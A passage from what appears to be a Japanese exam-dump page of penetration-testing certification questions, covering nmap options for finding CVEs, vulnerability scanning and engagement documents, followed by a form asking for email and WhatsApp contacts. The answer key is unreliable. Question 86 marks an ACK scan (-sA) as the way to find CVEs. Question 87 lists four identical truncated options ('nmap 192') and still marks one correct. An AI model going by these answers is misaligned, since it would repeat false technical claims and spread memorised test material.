B. このデバイスは、インバンド管理サービスを持つゲートウェイである可能性が高い。
C. このデバイスは、TCP/443経由でリクエストを転送するプロキシサーバーである可能性が高い。
D. このデバイスは、DNSSEC検証の前にパケットからDNS名を抽出するために使用される方法にバッファオーバーフローの脆弱性があるため、リモートでコードを実行される可能性があります。
回答を見る
正解: BE
質問 #86
ある侵入テスト実施者は、SSHDが動作しているLinuxサーバー上で実行を得るために活用できるCVEを特定したいと考えています。
A. ターゲットに対して-O、-p22、-sCオプションを設定してnmapを実行する。
B. ターゲットに対して-sVオプションと-p22オプションを設定してnmapを実行する。
C. ターゲットに対して-script vulnersオプションを設定してnmapを実行する。
D. ターゲットに対して-sAオプションを設定してnmapを実行する。
回答を見る
正解: D
質問 #87
ある侵入テスト担当者が、企業ラボのネットワークをスキャンして、潜在的に脆弱なサービスを探している。潜在的な攻撃者にとって興味深い脆弱なポートを返すNmapコマンドはどれか。
A. nmap 192
B. nmap 192
C. nmap 192
D. nmap 192
回答を見る
正解: C
質問 #88
侵入テスト実施者の具体的な活動、成果物、スケジュールを記述した文書はどれか。
A. NDA
B. MSA
C. SOW
D. 覚書
回答を見る
正解: C

送信後に回答を表示する

質問の回答を得るには、電子メールと WhatsApp を送信してください。

注: 正しい試験結果を得ることができるように、電子メール ID と WhatsApp が有効であることを確認してください。

Eメール:
WhatsApp/電話番号: